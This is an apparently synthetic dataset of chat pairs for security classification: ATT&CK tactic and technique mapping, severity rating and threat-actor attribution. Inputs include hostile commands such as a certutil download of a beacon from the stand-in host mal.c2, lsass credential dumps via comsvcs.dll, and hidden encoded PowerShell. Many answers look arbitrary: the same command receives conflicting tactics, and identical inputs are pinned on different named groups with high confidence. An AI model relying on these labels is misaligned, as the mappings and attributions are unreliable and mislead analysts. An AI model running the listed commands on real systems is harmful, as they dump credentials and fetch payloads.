messages listlengths 2 2 |
|---|
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.152.26.245",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"tech... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one.",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-5J86CWHZAL)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.61.48.65",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0006\"],... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.178.23.11",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"tec... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.149.168.176",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0003\", \"TA0006\"], \"techniques\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-TMD6FGCNEA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: VERMIN decrypts code, strings, and commands to use once it's on the victim's machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ryuk has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-3BVS783VWC)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Extre... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: 20 New processes The malicious svchost constantly queries ieframe.dll, as well as IWebBrowser2 Interface using CLSID dc30c1661-cdaf-11D0-8A3E-00c04fc9e26e, both key components to interact with Internet Explorer",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1164 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-2PSFE8NB1Z)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Defense Evasion, Persistence",
"role": "user"
},
{
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: DarkComet adds a Registry value for its installation routine to the Registry Key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System Enable LUA=\"0\" and HKEY_CURRENT_USER\\Software\\DC3_FEXEC.",
"role... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Regin leveraged several compromised universities as proxies to obscure its origin.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\", \"T1090.002\"]}",
"role": "... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2811 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.177.3.7",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1003.001\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ROKRAT can decrypt strings using the victim's hostname as the key.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-TIZY56YTIM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"High\", \"b... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1634 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LoadPackagedLibrary()",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-XYGHZ2C2LY)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Privilege Escalation, Defense Evasion",
"role... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3048 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.110.21.97",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BS2005 uses Base64 encoding for communication in the message body of an HTTP request.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1327 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.141.141.33",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0007\"]... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-RL1YP43CY9)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Execution",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: OSInfo queries the registry to look for information about Terminal Services.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.130.45.48",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0010... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TrickBot has also used Nt* API functions to perform Process Injection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-Q64T04XBTZ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Initial Access, Collection",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-7LO3SZ9MZE)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\": \"High... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Carberp has collected a list of running processes.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: AADInternals can gather information about a tenant’s domains using public Microsoft APIs.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1590\", \"T1590.001\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: An APT19 Port 22 malware variant registers itself as a service.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}",
"role": "assistant"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: VPN and to persist in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-YINS0P6R6W)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Defense Evasion",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.135.193.185",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3979 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-W7KNF7RFBW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2137 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.178.106.57",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techn... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-J8VRV8MJA1)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Lateral Movement",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SombRAT can enumerate services on a victim machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.34.112.63",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0001\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 774 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: UserInitMprLogonScript",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1037\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Carbanak checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode).",
"role": "user"
},
{
"content": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.158.125.186",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.22.115.205",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniqu... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Waterbear can leverage API functions for execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-BSI8EXNQZ3)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control, Initial Access",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Penquin can delete downloaded executables after running them.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 600 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techn... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3934 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.156.45.26",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1003.... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.75.228.145",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0005\"], \"techniques\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"High\"}... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.46.241.171",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may generate these cookies in order to gain access to web resources.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T1606.001\"]}",
"role": "as... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1565.001\", \"T... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1464 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confiden... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-HW7L1R04FI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Credential Access, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-YOOT35RAMT)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-P04ZBYG6FM)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Persistence",
"role": "user"
},
{
"content": "... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.32.26.35",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0011\", \"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SA Generates the following IRC client command that will be sent to the C2 server: PRIVMSG <username> : Hello ,my name is <IRC USER name>, Im ready my Computer Name is:<computer name> All of the commands, except ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.82.154.78",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-FJC0H6EN19)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration, Privilege Escalation",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"]... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2330 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.185.24.201",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techn... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-REGTV8QX4E)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Exfiltration",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-SV1LO6QVKX)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-YSCE9POCHP)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Lateral Movement, Exfiltration",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-2RKXKUD4PG)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2196 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: lists the running processes",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: OilRig has used macros to verify if a mouse is connected to a compromised machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.001\"]}",
"ro... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1316 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.",
"r... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-UVADKKELJZ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery, Impact, Credential Access",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-DU5F80W67C)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Execution",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2433 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3559 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.